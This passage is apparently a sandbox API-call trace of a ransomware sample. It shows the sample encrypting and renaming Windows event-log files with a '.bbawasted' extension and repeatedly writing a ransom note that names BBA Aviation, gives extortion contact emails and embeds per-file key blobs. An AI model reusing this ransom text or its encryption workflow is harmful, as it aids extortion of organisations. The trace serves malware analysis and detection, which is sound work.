[0197.698] CloseHandle (hObject=0x280) returned 1 [0197.698] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0197.698] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f98) returned 1 [0197.699] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0197.699] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0197.699] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6020) returned 1 [0197.700] CryptGenRandom (in: hProv=0x6a6020, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0197.700] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0197.717] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0197.718] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0197.718] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.718] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]WPGCHJnPhVRMUPxq4STaUGnPzRsI5qRFWs2UKmqGNevq347urDCKUAfRdjCagHOc\r\nb6KfnH8iocQn2EG1AsBuG3/iG2cU6D696upceY6LVN6OWj1IvIj9wLLtIN4dYZ40\r\nSXgQbpEy0awglF2hciYaqBz7m0At7jfygUOTXGQQeO+cbdMq7ewQUmbiE4ftYFTr\r\n/EWV42/5FeyKzT0SKx7S7sTsXuORb7q8sKGDKYxYmODXIMmmz8rIEtkjiPkdGGyo\r\n3EX23PxQ0RQ7ATmEQOptLwZuRgO/OLR28LDybz5Kl/j7lTySWvTxqEXmCZvLs0xq\r\nhgBgQUWYFz6YEh6BTGCxqX1Cj/4hZL6/W/X+vlhzIvL2/Ld37WDL7n3tNgCHF2c2\r\nxDISifBCAOhUnyFgTqD0g+nQ+SRdo+y2YiTYi3aRktPX2OZM47PbbBXOjmQhmsBl\r\nRWFHeh/84wo4X1h1SdO5B9zMQ+KVXkxJs8arWrYwrM8a6xYQK0myowlO7VP7cJwd\r\nz7IMY2gaa8Tj9yTsT8EuJ9KkVrVg9b24ln0OQwApftZqkRd0gubz+rNvgOtP1IJZ\r\nqSiHk8iXRoVkVDavyvegW32DmrjOTvjx690fy4SXiib3wHOHp9qgbsoHjh39VEMF\r\nr1wcjcrEUnNnEL0hmDBdCS0NHZTn8hCOvfr6o3afctW=[end_key]\r\nKEEP IT\r\n") returned 984 [0197.718] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0197.718] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0197.718] SetEndOfFile (hFile=0x28c) returned 1 [0197.771] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.771] CloseHandle (hObject=0x28c) returned 1 [0197.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0197.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69f930 | out: hHeap=0x660000) returned 1 [0197.776] _aulldvrm () returned 0x0 [0197.776] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0197.777] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0197.777] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0197.777] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx") returned 82 [0197.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2ae) returned 0x6aecf0 [0197.777] lstrcpyW (in: lpString1=0x6aed94, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0197.777] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.777] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6130) returned 1 [0197.778] CryptGenRandom (in: hProv=0x6a6130, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0197.778] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0197.778] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0197.779] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0197.780] SetEndOfFile (hFile=0x28c) returned 1 [0197.780] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.781] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.781] lstrcpyW (in: lpString1=0x6aed94, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0197.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx.bbawasted")) returned 1 [0197.783] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4admin.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0197.783] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0197.783] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0197.783] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0197.783] CloseHandle (hObject=0x280) returned 1 [0197.789] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0197.789] CloseHandle (hObject=0x294) returned 1 [0197.789] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0197.790] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6ce0) returned 1 [0197.790] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0197.790] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0197.790] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a60a8) returned 1 [0197.791] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0197.791] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0197.799] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0197.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0197.800] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.800] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Pxw6OywnqSyi/f6UCBMZEieL9HjG5E7x+zucAAqwtKyzyJQ8t9IN6o7QZc0jsuLe\r\n7USbD/VYLRHqCqVZfrnC118852ybZwB4EZo4NLE218M/zhAhMvMpCUAbMk7XZG88\r\n2/8JUOHfRgnr3zdAoofp4bfLmFwl80uTrkKn5V+8N6JnBRLkSEyYzJsZmh4Xut9t\r\n25w3R1aIsrI8Y18377sXp7A4msC3/jUZK2eaWiI1S8lVqlHA5vy3vMvIURN+adeF\r\nj/nRF0GYy6QI9LXYbCCy/s9if+ZPkxKDj43ikr197xkTJxEZjevuIE7IwCd1PSQx\r\nWPa2Zzk6uUCSesK9+zoYiFGpJOMwm6eFwcdnravXVZz49ryrZUh9IewnT4wGUzem\r\npXXUt2mrneZ1j5eDIOxlEUuZe/vbnZojKfqfgWmPXJ3gn1c+FKu0UUAR8U+ax4Zu\r\nH1SX6eV1I7Ru1bR/6SCoVfaVtelhi1K0d2fJ/0PZnXVIbOe7mEM1WgJqJIPV6CRi\r\nMTT6uLPe7IxHgiZ4fPa4zwOCkza9evnkpbulc16b66zke+fAFANJY9bSJNsjrHvb\r\nYAhKf+xAU/0kL8aNmUcJ5p25zNjnyAUpthrGC+bS/V3ST3I4mRnZgp2b9DRFMr5b\r\nOvTkFmYXqZ1AYHk7wzzKg5BOSRO8DEAW7LtSnSv8Y9/=[end_key]\r\nKEEP IT\r\n") returned 984 [0197.800] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0197.800] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0197.800] SetEndOfFile (hFile=0x28c) returned 1 [0197.802] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.802] CloseHandle (hObject=0x28c) returned 1 [0197.804] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0197.804] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69fa38 | out: hHeap=0x660000) returned 1 [0197.804] _aulldvrm () returned 0x0 [0197.804] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a61b8) returned 1 [0197.865] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0197.866] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0197.866] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx") returned 88 [0197.866] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2ba) returned 0x6aecf0 [0197.866] lstrcpyW (in: lpString1=0x6aeda0, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0197.866] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.866] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6020) returned 1 [0197.867] CryptGenRandom (in: hProv=0x6a6020, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0197.867] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0197.867] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0197.952] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0197.953] SetEndOfFile (hFile=0x28c) returned 1 [0197.954] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.954] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.954] lstrcpyW (in: lpString1=0x6aeda0, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0197.954] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx.bbawasted")) returned 1 [0197.955] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-terminalservices-remoteconnectionmanager%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0197.956] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0197.956] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0197.956] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0197.956] CloseHandle (hObject=0x294) returned 1 [0197.962] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0197.963] CloseHandle (hObject=0x280) returned 1 [0197.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0197.963] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6790) returned 1 [0197.964] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0197.964] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0197.964] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6790) returned 1 [0197.964] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0197.964] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0197.973] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0197.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0197.973] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0197.973] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]nT53ELvOFwkjlNOo+Sb16eijMvtWQ0Qu6EnQlaKKSnp/PK3VF6Hp99y5zDoGUnN7\r\ncW/5t9PuS4Xs1t/b5I2HnJDQpIuyRWRI7P5JNp49GxehUjpbINLXkUH58Ly0ntpE\r\nju0M2KybY2dIiFXogUnII36a2HHtH8/YDUgH0hMqZUh7uIAkRVFrA4Mc0c4Um0Gm\r\nm4KV1OVBGxhuQ9Wm45eBEmdiHWxBnjGKMRn5osj8YirtGjqqaPeQiUDkb2zuHbZG\r\nvIcck3zfSEhGwI18P5kO/CHUtJCVb4LLr3pvlK3KyPiycqyWmsJQjEdkuS21VGz1\r\nTNC+KEOuyMJrcL0qlT1Vjoq/NsfL5MgHp559HADxjgyHcZPTThtMPkB2xaJBQuig\r\nM+z8pCYNGAa7SjyZrl2T/kU2USDfJFqKLqxVSsgaJfCtC7GkaCUPuKNrsTGqu9PR\r\nfEL22UzZdPahvdrRQsWmQxTG03M5lWidpfkq04E+Nfy+OFy+2HEfBakmSe5HhawS\r\nJDlnusDLGzpQWS9jK6XLqxknITBbZ8xNwmrN7r0gyYwLMHK9t2r6TCkhLi1/oml8\r\nRwggQQ6OhQmaVb76zH5vAWjo1PCaRv91Ppo87oWe6CkkkFI78dKn1VYqMLjCctCu\r\nXhg7HqzFw0SMD10gOXU1soznwZWivTPR/4cR05KXj/u=[end_key]\r\nKEEP IT\r\n") returned 984 [0197.973] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0197.973] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0197.973] SetEndOfFile (hFile=0x28c) returned 1 [0197.976] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0197.976] CloseHandle (hObject=0x28c) returned 1 [0198.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0198.017] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69fb38 | out: hHeap=0x660000) returned 1 [0198.017] _aulldvrm () returned 0x0 [0198.017] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a69b0) returned 1 [0198.017] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0198.018] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0198.018] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx") returned 54 [0198.018] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x6aecf0 [0198.018] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0198.018] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.018] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6ce0) returned 1 [0198.019] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0198.019] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0198.019] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0198.019] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0198.021] SetEndOfFile (hFile=0x28c) returned 1 [0198.021] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.021] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.021] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0198.021] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx.bbawasted")) returned 1 [0198.022] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-TWinUI%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-twinui%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0198.022] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0198.022] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0198.022] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0198.022] CloseHandle (hObject=0x280) returned 1 [0198.038] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0198.038] CloseHandle (hObject=0x294) returned 1 [0198.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0198.039] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6b48) returned 1 [0198.053] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0198.053] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0198.054] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a60a8) returned 1 [0198.054] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0198.054] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0198.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0198.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0198.065] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.065] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 